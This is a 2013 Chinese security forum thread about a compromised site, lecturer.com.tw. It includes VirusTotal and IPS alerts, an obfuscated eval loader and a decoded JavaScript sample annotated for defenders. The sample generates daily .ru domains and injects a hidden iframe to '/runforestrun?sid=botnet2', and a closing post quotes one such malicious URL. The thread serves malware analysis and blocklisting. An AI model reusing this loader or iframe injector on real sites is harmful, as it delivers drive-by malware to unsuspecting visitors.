
[未鉴定] http://lecturer.com.tw/product-16/content/54.phtml

firefox3
发表于 2013-3-20 11:54:51 | 显示全部楼层 |阅读模式
https://www.virustotal.com/en/ur ... nalysis/1363751620/
Normalized URL:         htt p://lecturer.com.tw/product-16/content/54.phtml
Detection ratio:         4 / 36
Analysis date:         2013-03-20 03:53:40 UTC ( 0 minutes ago )
File scan:         The URL response content could not be retrieved or it is some text format (HTML, XML, CSV, TXT, etc.), hence, it was not enqueued for antivirus scanning.
狴犴睚眦
发表于 2013-3-20 18:20:36 | 显示全部楼层
谷歌浏览器
捕获.PNG
Tom179090
发表于 2013-3-20 18:21:10 | 显示全部楼层
类别: 入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/3/20 星期三 18:20:47,高,阻止了 lecturer.com.tw 的入侵企图,已阻止,不需要操作,Web Attack: Mass Injection Website,不需要操作,不需要操作,"lecturer.com.tw (202.153.173.21, 80)",lecturer.com.tw/js/songyan.js,"TOM (192.168.1.18, 54855)",202.153.173.21 (202.153.173.21),"TCP, www-http"
来自 <b>lecturer.com.tw/js/songyan.js</b> 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE 引起。  要停止接收有关此类通信的通知,请在<b>“操作”</b>面板中单击<b>“不再提醒我”</b>。
类别: 入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/3/20 星期三 18:20:47,高,阻止了 lecturer.com.tw 的入侵企图,已阻止,不需要操作,Web Attack: Mass Injection Website 2,不需要操作,不需要操作,"lecturer.com.tw (202.153.173.21, 80)",lecturer.com.tw/js/songyan.js,"TOM (192.168.1.18, 54855)",202.153.173.21 (202.153.173.21),"TCP, www-http"
来自 <b>lecturer.com.tw/js/songyan.js</b> 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE 引起。  要停止接收有关此类通信的通知,请在<b>“操作”</b>面板中单击<b>“不再提醒我”</b>。

一共检测到两次攻击
哀酱俏佳人
发表于 2013-3-20 20:20:59 | 显示全部楼层
92,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,708,525,690,525,588,525,648,525,696,605,192,305,192,170,624,525,600,500,606,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}if(f)e(s);}


/**
 * One step of the multiplicative congruential generator set up by
 * RandomNumberGenerator; it is the DGA's only source of "randomness".
 *
 * The update has the shape of Schrage's method (seed = A*(seed mod Q) -
 * R*(seed div Q), plus M when the result is not positive), but Q is
 * computed in the constructor as M / A without integer truncation, so hi
 * and lo are fractional and the sequence is NOT the textbook integer
 * generator. Anyone regenerating domains for a blocklist has to reproduce
 * this floating-point arithmetic exactly.
 *
 * @returns {number} this.seed / M, nominally in [0, 1]
 */
function nextRandomNumber(){
  var hi = this .seed / this .Q;   // fractional, since Q is not an integer
  var lo = this .seed % this .Q;   // floating-point remainder
  var test = this .A * lo - this .R * hi;
  if (test > 0){
    this .seed = test;
  }
  else {
    this .seed = test + this .M;   // wrap back into range
  }
  return (this .seed * this .oneOverM);   // scale to [0, 1] via 1/M
}
/**
 * Seeds the generator from the victim's clock. Only month, day-of-month
 * and an AM/PM flag (hours > 12) feed the seed — the year is not used —
 * so every run within the same half-day of the same calendar date yields
 * the same domain sequence. That is what lets defenders pre-compute the
 * DGA output for a given day and block it ahead of time.
 *
 * getMonth/getDate/getHours are local-time getters, so victims in
 * different time zones can disagree near the midnight and 13:00 boundaries.
 *
 * @param {number} unix - seconds since the epoch (the caller passes "now")
 * @returns {this}
 */
function RandomNumberGenerator(unix){
  var d = new Date(unix * 1000);
  var s = d.getHours() > 12 ? 1 : 0;   // 0 for hours 0-12, 1 for hours 13-23
  this .seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.
  round(s * 0xFFF));   // Math.round on an integer is a no-op here
  this .A = 48271;            // multiplier
  this .M = 2147483647;       // 2^31 - 1; A and M are the classic MINSTD constants
  this .Q = this .M / this .A;   // floating-point quotient (no Math.floor) — see nextRandomNumber
  this .R = this .M % this .A;   // 3399
  this .oneOverM = 1.0 / this .M;   // precomputed scale factor for next()
  this .next = nextRandomNumber;
  return this ;
}
/**
 * Draw one value from the generator and scale it to an integer in
 * [Min, Max] (inclusive at both ends, since Math.round is used).
 *
 * @param {{next: function(): number}} r - generator exposing next() in [0, 1]
 * @param {number} Min - lower bound of the result
 * @param {number} Max - upper bound of the result
 * @returns {number} rounded value of (Max - Min) * r.next() + Min
 */
function createRandomNumber(r, Min, Max){
  var unit = r.next();
  var span = Max - Min;
  return Math.round(span * unit + Min);
}
/**
 * The domain generation algorithm proper: seeds a generator from `unix`
 * and draws `length` lowercase letters, then appends "." and `zone`.
 * Because the seed depends only on the calendar half-day, calling this
 * with a chosen timestamp reproduces the domains a victim would contact
 * on that day — useful for building blocklists or sinkholes.
 *
 * @param {number} unix - seconds since the epoch used to seed the generator
 * @param {number} length - number of letters in the host label
 * @param {string} zone - TLD appended after the dot (e.g. 'ru')
 * @returns {string} "<letters>.<zone>"
 */
function generatePseudoRandomString(unix, length, zone){
  var alphabet = 'abcdefghijklmnopqrstuvwxyz';
  var rng = new RandomNumberGenerator(unix);
  var label = [];
  var drawn = 0;
  while (drawn < length){
    // one generator step per character, in order, so the sequence matches
    label.push(alphabet[createRandomNumber(rng, 0, alphabet.length - 1)]);
    drawn ++;
  }
  return label.join('') + '.' + zone;
}
// Payload: 500 ms after this script runs, inject one hidden iframe that
// points at the DGA-generated host. The path "/runforestrun?sid=botnet2"
// is a fixed string and is the most stable thing to match on in proxy or
// IDS logs, since the host changes twice a day. `iframeWasCreated` and
// `ifrm` are never declared, so both become implicit globals: the first
// acts as a once-per-page guard, the second leaks the element as window.ifrm.
// NOTE(review): the IPS alerts quoted earlier in the thread name
// lecturer.com.tw/js/songyan.js — presumably the file this was decoded
// from; confirm against the original sample.
setTimeout(function (){
  try {
    if (typeof iframeWasCreated == "undefined"){   // run at most once per page
      iframeWasCreated = true;
      var unix = Math.round( + new Date() / 1000);   // unary + yields ms since epoch
      var domainName = generatePseudoRandomString(unix, 16, 'ru');   // 16 letters + ".ru"
      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
      ifrm.style.width = "0px";   // 0x0 and hidden: nothing visible to the user
      ifrm.style.height = "0px";
      ifrm.style.visibility = "hidden";
      document.body.appendChild(ifrm);
    }
  }
  catch (e){
    // errors are swallowed; nothing is logged or surfaced
  }
}
, 500);
firefox3
 楼主| 发表于 2013-3-20 20:22:01 | 显示全部楼层
哀酱俏佳人 发表于 2013-3-20 20:20
92,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,708,525,690,525,588,525,648,525,696,6 ...

http://bbs.kafan.cn/thread-1506914-1-1.html
哀酱俏佳人
发表于 2013-3-20 20:28:53 | 显示全部楼层
firefox3 发表于 2013-3-20 20:22
http://bbs.kafan.cn/thread-1506914-1-1.html

http://qxsjdyodxeyyechp.ru/runforestrun?sid=botnet2 这个貌似已失效了